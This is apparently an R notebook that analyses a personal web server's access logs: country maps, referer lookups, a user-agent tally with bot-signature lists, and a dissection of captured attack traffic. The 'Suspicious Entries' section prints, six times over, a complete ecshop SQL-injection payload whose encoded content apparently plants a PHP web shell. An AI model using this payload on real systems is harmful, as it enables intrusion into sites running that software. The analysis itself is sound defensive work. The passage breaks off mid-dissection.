Traffic Journal ::001:: bcable.net HTTPD Logs

Libraries

library(ggplot2)
library(iptools)

library(gganimate)
library(transformr)

Git repositories for extra packages reference:

https://github.com/thomasp85/gganimate

https://github.com/thomasp85/transformr

Local Sourcing

Source of below includes: https://bcable.net/x/Rproj/shared

source("../../shared/load_recurse.R")
source("../../shared/load_varlog.R")
source("../../shared/parse_rawsplit.R")
source("../../shared/paths.R")

source("../../shared/cleanup_logs.R")
source("../../shared/geoip.R")
source("../../shared/country_code_cleanup.R")
source("../../shared/world_mapper.R")

Config

# Host label used in every plot title below; change it when reusing this
# notebook for another server's logs.
site_name <- "bcable.net"

GeoIP Disclaimer

Geolocation based on IP address is not to be taken as entirely accurate as to the source of traffic or attacks conducted. There are many reasons for this, which include (but are not limited to):

Proxies, VPNs, and Tor

Large quantities of traffic, especially attack based traffic, will use a VPN or the Tor network (or some reasonable facsimile), to mask the origin of the traffic. This will in turn change the appearance of the location of origin. Usually, an attacker will also intentionally want the traffic to appear to come from somewhere that has some form of lesser legal jurisdiction, some form of lesser ability to police traffic, or come from a well known source of malicious attacks such as China or Russia.

For instance, the following log entry was generated by myself against my servers while sitting at my desk in the United States, but it gets geolocated as Russia because of how the packet was sent. This sort of masking is trivial to perform, even by a nine-year-old on a cellphone.

# The self-generated request that GeoIP attributes to Russia: show only the
# request line, status code and country for the rows whose Request matches.
subset(
    httpd_data,
    grepl("/from/russia/with/logs", Request),
    select=c(Request, Response.Code, Country.Code)
)

##                               Request Response.Code Country.Code
## 1 GET /from/russia/with/logs HTTP/1.1           404           RU

Vulnerable Servers and Botnets

Some locations have a higher concentration of virtual servers than others, such as Silicon Valley or China. This can lead to larger quantities of vulnerable virtual machines and servers in those regions, and traffic relayed through such compromised hosts is geolocated to the host, not to whoever is controlling it.

Government Interference

It is possible that due to address assignment for governmental intelligence purposes or other economic or political reasons a nation could re-allocate address space and forge the identity similarly to a NAT (network address translation). They could also funnel information via VPN technologies for another nation.

Because most of these agreements are made in private, and due to the fact that most geolocation and WHOIS records are based on self-reporting, it is impossible to know the 100% true nature of geographic address assignment.

Weaknesses or errors in MaxMind or rgeolocate package

This geolocation uses the rgeolocate package available on CRAN, together with the internal country database that ships with it. There could be an error in the shipped database, there could be an error in the lookup code, etc. Bugs happen. I have no reason to believe, however, that any false geolocation is being performed by these packages.

Final Note

Despite these weaknesses, this doesn't change the fact that looking at this sort of data can be quite fun and interesting, and potentially enlightening. Generalized conclusions should not be made from this data or the maps herein. You have been warned.

Load Files

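# Load Files ----
# Assemble the HTTPD data frame from the rotated access_log files. Every
# parsed column below originates in client-supplied log text (request line,
# Referer, User-Agent), so treat it as untrusted input rather than as fact.
httpd_data <- load_varlog(file.path(path_appel, "httpd"), "access_log")
httpd_data <- raw_populate(httpd_data)
httpd_data <- cleanup_httpd(httpd_data)

# Raw.Split is assumed to be a list column holding one character vector per
# log line in combined-log-format order: 1 client IP, 2-3 "-", 4 "[date",
# 5 "offset]", 6 request line, 7 status, 8 bytes, 9 referer, 10 user agent
# -- TODO confirm against raw_populate(). vapply() (rather than sapply())
# guarantees a character vector even when there are zero rows.
split_field <- function(i) {
    vapply(httpd_data$Raw.Split, function(fields) fields[i], character(1))
}

httpd_data$IP.Address <- split_field(1)

# Fields 4 and 5 carry "[dd/Mon/yyyy:HH:MM:SS" and "+hhmm]". Parsing them
# together with %z anchors each timestamp to the offset recorded on its own
# line (strptime ignores the trailing "]"); the previous substr() over the
# list column could not yield a valid zone name. Results are expressed in UTC.
httpd_data$Date <- as.POSIXlt(
    paste(split_field(4), split_field(5)),
    format="[%d/%b/%Y:%H:%M:%S %z", tz="UTC"
)

httpd_data$Request <- split_field(6)

# Status and length are kept as character here; later chunks compare
# Response.Code with == 404, which coerces either way.
httpd_data$Response.Code <- split_field(7)
httpd_data$Response.Length <- split_field(8)

httpd_data$HTTP.Referer <- split_field(9)
httpd_data$User.Agent <- split_field(10)

# Country attribution comes from the bundled GeoIP database; see the
# disclaimer above for why it is a hint, not ground truth.
ret <- geoip(httpd_data$IP.Address, "country_code")
httpd_data$Country.Code <- ret$country_code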

Date Min: 2018-08-26 03:16:04
Date Max: 2018-10-28 07:36:07

World Hits

# Re-display the "from Russia" request (see the GeoIP disclaimer): request
# line, status code and country for the matching rows only.
subset(
    httpd_data,
    grepl("/from/russia/with/logs", Request),
    select=c(Request, Response.Code, Country.Code)
)
##                               Request Response.Code Country.Code
## 1 GET /from/russia/with/logs HTTP/1.1           404           RU
# Hits by country: aggregate every request's GeoIP country code and draw the
# choropleth with a site-specific title and a green gradient for hit counts.
httpd_country_df <- country_code_cleanup(httpd_data$Country.Code)
g <- world_mapper(httpd_country_df) +
    labs(
        title=paste0(site_name, ": HTTPD: Hits by Country"),
        fill="Hits", x="", y=""
    ) +
    scale_fill_continuous(low="#003000", high="#00E000", guide="colorbar")
g

plot of chunk world_hits

World 404s

# 404s by country: the same map restricted to requests that drew a 404.
# The == comparison coerces, so it works whether Response.Code is character
# or numeric; an NA status selects an NA row exactly as before.
httpd_country_df <- country_code_cleanup(
    httpd_data[httpd_data$Response.Code == 404, "Country.Code"]
)

g <- world_mapper(httpd_country_df) +
    labs(
        title=paste0(site_name, ": HTTPD: 404 Hits by Country"),
        fill="404 Hits", x="", y=""
    ) +
    scale_fill_continuous(low="#003000", high="#00E000", guide="colorbar")
g

plot of chunk world_404s

HTTP Referer DNS/GeoIP Lookup

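# HTTP Referer DNS/GeoIP Lookup ----
# Reduce each Referer to its host name. Non-URL referers ("-", bare strings,
# injected payloads) do not match the pattern and pass through sub()
# unchanged; they simply fail to resolve below.
referer_dns <- sub(
    "^http[s]?://([^/:]+)([/:].*)?$", "\\1",
    httpd_data$HTTP.Referer, ignore.case=TRUE
)

# Per-host hit counts (kept for later chunks; not used on this page).
referer_stats <- data.frame(
    DNS.Address=names(table(referer_dns)),
    Count=as.vector(table(referer_dns))
)

# Resolve each distinct host exactly once; computing unique() a single time
# keeps referer_ip and DNS.Address aligned by position when merged below.
# NOTE(review): this issues live DNS queries for names taken verbatim from
# client-controlled Referer headers. It is slow for large logs and tells the
# operator of any such domain that its name is being looked up; run it from a
# network you are comfortable exposing and consider caching the results.
unique_dns <- unique(referer_dns)
referer_ip <- iptools::hostname_to_ip(unique_dns)
# Keep only the first address for hosts that resolve to several.
referer_ip <- vapply(referer_ip, function(addrs) addrs[1], character(1))
ret <- geoip(referer_ip, "country_code")
referer_country_code <- ret$country_code

# One row per distinct host ...
referer_merger <- data.frame(
    IP.Address=referer_ip,
    DNS.Address=unique_dns,
    Country.Code=referer_country_code
)

# ... joined back onto every referer occurrence so that the country tally is
# weighted by hit count rather than by distinct host.
referer_df <- data.frame(DNS.Address=referer_dns)
referer_df <- merge(referer_df, referer_merger, by="DNS.Address")
referer_country_df <- country_code_cleanup(referer_df$Country.Code)
referer_country_df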
##           Country Count
## 1          Canada     5
## 2           China    24
## 3  Czech Republic     3
## 4         Germany    10
## 5         Estonia     3
## 6          France    27
## 7           Italy     1
## 8           Japan     2
## 9     South Korea    11
## 10     Kazakhstan     3
## 11         Russia    82
## 12         Sweden     1
## 13      Singapore     3
## 14         Taiwan     2
## 15        Ukraine     9
## 16            USA  5825
g <- world_mapper(referer_country_df)
g <- g + labs(
    title=paste0(site_name, ": HTTP Referer DNS/GeoIP Lookup", collapse=""),
    fill="Hits", x="", y=""
)
g <- g + scale_fill_continuous(low="#003000", high="#00E000", guide="colorbar")
g

plot of chunk world_referer

User Agent

# User Agent ----
# Token lists used as regular-expression fragments against the User-Agent
# column. That header is client-supplied and freely forgeable, so the tallies
# describe what clients *claim* to be; scanners routinely impersonate
# browsers (the ecshop probe further down announces itself as MSIE 9.0).
# ua_os, ua_randbrowser, ua_randsoftware and ua_none are not referenced by
# the chunks visible here.
ua_os <- c("Media Center PC", "Android", "iPhone", "360", "Linux", "Windows NT")
# Counted in this order by the elimination loop below (e.g. an Edge UA also
# contains "Chrome" and "Safari", so "Edge" must precede them).
ua_browser <- c("MSIE", "Edge", "OPR", "Opera", "Chrome", "Safari", "Firefox")
ua_randbrowser <- c("QQBrowser", "gemini")
# "sysscan" is listed twice; harmless in an alternation, but worth tidying.
ua_randsoftware <- c("CarlosMatos", "curl", "Deepnet Explorer", "Hakai", "HeadlessChrome", "ia_archiver", "Jersey", "masscan", "PxBroker", "sysscan", "w3C_Validator", "zgrab", "sysscan", "axios")
ua_none <- c("-", "null")
# Bot signatures, joined with "|" below. Some entries are genuine regexes
# ("^Mozilla/[45](\\.0)?$", "Go [0-9]\\.[0-9] package http"); unescaped dots
# in names such as "Mail.RU_Bot" or "Java/1." match any single character.
ua_bot <- c("AhrefsBot", "AlphaBot", "Baidu", "bingbot", "coccocbot", "DotBot", "ExtLinksBot", "Googlebot", "ICC-Crawler", "Mail.RU_Bot", "MJ12bot", "magpie-crawler", "Nimbostratus-Bot", "oBot", "redditbot", "SEMrushBot", "Gluten Free Crawler", "RankingBot2", "ResearchScan", "SemrushBot", "SeznamBot", "SiteExplorer", "Sogou", "SEOkicks", "The Knowledge AI", "Wada.vn", "YandexBot", "YisouSpider", "ZoominfoBot", "www.probethenet.com", "python-requests", "^Mozilla/[45](\\.0)?$", "robots", "Mediapartners-Google", "PHPCrawl", "Java/1.", "Go-http-client", "LMAO", "Dataprovider.com", "Yahoo! Slurp", "SurdotlyBot", "DuckDuckGo-Favicons-Bot", "ZmEu", "CCBot", "MegaIndex.ru", "nmap", "MojeekBot", "BingPreview", "Ronin", "GigablastOpenSource", "facebookexternalhit", "btcrawler", "Gogolbot", "NetcraftSurveyAgent", "Virusdie", "Shinka", "Qwantify", "Gemini", "Telesphoreo", "Grobbot", "linkdexbot", "spuhex.com", "lua-resty-http", "PocketParser", "PxBroker", "HttpUrlConnection", "Indy Library", "CATExplorador", "Validator.nu", "Go [0-9]\\.[0-9] package http", "SafeDNSBot", "spbot", "Netcraft Web Server Survey", "Faraday", "fasthttp", "archive.org_bot", "WebCapture", "WinHttp.WinHttpRequest")
# Tally skeleton: one row per browser plus the "Bot" and "Other" buckets,
# hence the +2.
browser_count <- data.frame(
    Browser=c("Bot", "Other", ua_browser),
    Count=rep(0, length(ua_browser)+2)
)

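# allow for data to be removed, so you don't double count things
temp_httpd_data <- httpd_data

# Classification is by sequential elimination: each pattern is counted only
# against the rows no earlier pattern claimed, so the order (bots first,
# then ua_browser in its listed order) decides which family a User-Agent
# containing several product tokens is credited to.

# deal with bots first as one big group; build the alternation once
bot_pattern <- paste0(ua_bot, collapse="|")
is_bot <- grepl(bot_pattern, temp_httpd_data$User.Agent)
browser_count$Count[browser_count$Browser == "Bot"] <- sum(is_bot)
temp_httpd_data <- temp_httpd_data[!is_bot, ]

# now deal with each browser (grepl() is FALSE for an NA User-Agent, so such
# rows are never counted and fall through to "Other", as before)
for (browser in ua_browser) {
    is_browser <- grepl(browser, temp_httpd_data$User.Agent)
    browser_count$Count[browser_count$Browser == browser] <- sum(is_browser)
    temp_httpd_data <- temp_httpd_data[!is_browser, ]
}

# the rest: whatever no pattern matched. nrow() is the number of remaining
# log lines; length() of a data frame is its column count, which is why the
# earlier version always reported the column count here.
browser_count$Count[browser_count$Browser == "Other"] <- nrow(temp_httpd_data)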
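# Skeleton for a per-OS tally. Browser and Count must have the same length or
# data.frame() aborts; the "+2" belonged to browser_count's extra "Bot" and
# "Other" rows and does not apply here. NOTE(review): the column name and
# ua_browser look copied from browser_count; an OS table would presumably be
# built from ua_os instead -- confirm the intent before using this.
os_count <- data.frame(
    Browser=c(ua_browser),
    Count=rep(0, length(ua_browser))
)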
## Error in data.frame(Browser = c(ua_browser), Count = rep(0, length(ua_browser) + : arguments imply differing number of rows: 7, 9
# Print the finished tally (Bot, Other, then one row per browser).
browser_count
##   Browser Count
## 1     Bot 14133
## 2   Other    11
## 3    MSIE  1797
## 4    Edge    20
## 5     OPR   113
## 6   Opera    18
## 7  Chrome  7280
## 8  Safari  1723
## 9 Firefox 19932
# Bar chart of the tally; geom_col() is the shorthand for
# geom_bar(stat="identity") and draws bar heights straight from Count.
g <- ggplot(browser_count, aes(x=Browser, y=Count)) + geom_col()
g

plot of chunk graph_browsers

Suspicious Entries

This turned out to be quite a unique and complicated rabbit hole to dig down, actually.

SQL Injection Rabbit Hole

An interesting attack attributed to China by GeoIP; I found it by looking for “union”-based SQL injection in my logs:

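# SQL keywords are case-insensitive, so match "union" regardless of case
# (UNION, Union, ...); a case-sensitive grep would miss those variants.
httpd_data[grep("union", httpd_data$HTTP.Referer, ignore.case=TRUE),]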
##                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             Raw
## 24015 [IPREDACTED] - - [23/Sep/2018:18:32:24 +0000] "GET //user.php?act=login HTTP/1.1" 302 221 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
## 24016  [IPREDACTED] - - [23/Sep/2018:18:32:25 +0000] "GET /user.php?act=login HTTP/1.1" 404 206 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
## 24672 [IPREDACTED] - - [24/Sep/2018:11:26:06 +0000] "GET //user.php?act=login HTTP/1.1" 302 221 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
## 24673  [IPREDACTED] - - [24/Sep/2018:11:26:07 +0000] "GET /user.php?act=login HTTP/1.1" 404 206 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
## 25609 [IPREDACTED] - - [25/Sep/2018:10:32:09 +0000] "GET //user.php?act=login HTTP/1.1" 302 221 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
## 25610  [IPREDACTED] - - [25/Sep/2018:10:32:10 +0000] "GET /user.php?act=login HTTP/1.1" 404 206 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
##                 File.Name
## 24015 access_log-20180930
## 24016 access_log-20180930
## 24672 access_log-20180930
## 24673 access_log-20180930
## 25609 access_log-20180930
## 25610 access_log-20180930
##                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Raw.Split
## 24015 [IPREDACTED], -, -, [23/Sep/2018:18:32:24, +0000], GET //user.php?act=login HTTP/1.1, 302, 221, 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}, Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 24016  [IPREDACTED], -, -, [23/Sep/2018:18:32:25, +0000], GET /user.php?act=login HTTP/1.1, 404, 206, 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}, Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 24672 [IPREDACTED], -, -, [24/Sep/2018:11:26:06, +0000], GET //user.php?act=login HTTP/1.1, 302, 221, 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}, Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 24673  [IPREDACTED], -, -, [24/Sep/2018:11:26:07, +0000], GET /user.php?act=login HTTP/1.1, 404, 206, 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}, Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 25609 [IPREDACTED], -, -, [25/Sep/2018:10:32:09, +0000], GET //user.php?act=login HTTP/1.1, 302, 221, 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}, Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 25610  [IPREDACTED], -, -, [25/Sep/2018:10:32:10, +0000], GET /user.php?act=login HTTP/1.1, 404, 206, 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}, Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
##            IP.Address                Date
## 24015 [IPREDACTED] 2018-09-23 18:32:24
## 24016 [IPREDACTED] 2018-09-23 18:32:25
## 24672 [IPREDACTED] 2018-09-24 11:26:06
## 24673 [IPREDACTED] 2018-09-24 11:26:07
## 25609 [IPREDACTED] 2018-09-25 10:32:09
## 25610 [IPREDACTED] 2018-09-25 10:32:10
##                                 Request Response.Code Response.Length
## 24015 GET //user.php?act=login HTTP/1.1           302             221
## 24016  GET /user.php?act=login HTTP/1.1           404             206
## 24672 GET //user.php?act=login HTTP/1.1           302             221
## 24673  GET /user.php?act=login HTTP/1.1           404             206
## 25609 GET //user.php?act=login HTTP/1.1           302             221
## 25610  GET /user.php?act=login HTTP/1.1           404             206
##                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   HTTP.Referer
## 24015 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}
## 24016 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}
## 24672 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}
## 24673 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}
## 25609 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}
## 25610 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}
##                                                            User.Agent
## 24015 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 24016 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 24672 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 24673 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 25609 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 25610 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
##       Country.Code
## 24015           CN
## 24016           CN
## 24672           CN
## 24673           CN
## 25609           CN
## 25610           CN

Not really sure what they are trying to do here. There's not really much PHP on this site anymore (I've turned everything static for a reason). “user.php” doesn't exist, so I'm guessing this is an attempted attack on a specific piece of software.

Searching for “554fcae493e564ee0dc75bdf2ebf94ca”, the very unique hash came up with a few different websites that seem to have fallen victim to it. A quick MD5 crack comes up with the string “ecshop”. Searching for “ecshop” came up with the following GitHub project:

https://github.com/yezilong9/ecshop

With this “/user.php” that has a parameter check on “act=login”:

https://github.com/yezilong9/ecshop/blob/master/user.php

Dissecting this and using Google Translate to figure out some meanings:

“Mall system, support WeChat”

A WeChat based shopping system?

Member Centre
==========================================================
* Copyright 2005-2012 Shanghai Shangpai Network Technology Co., Ltd., and all rights reserved.
* Website address: http://www..com;
* ------------------------------------------------- ---------------------------
* This is not a free software! You may only modify the program code without commercial use and
* Use; no re-release of the program code for any purpose or for any purpose.

Back to the payload itself: it uses a PHP-serialized array (the `a:2:{s:3:"num";...}` structure) and injects SQL into one of its string members. The UNION SELECT reads from no table; it supplies literal values, with the two payloads placed in columns 2 and 9, where the application evidently expects them.

0x272f2a
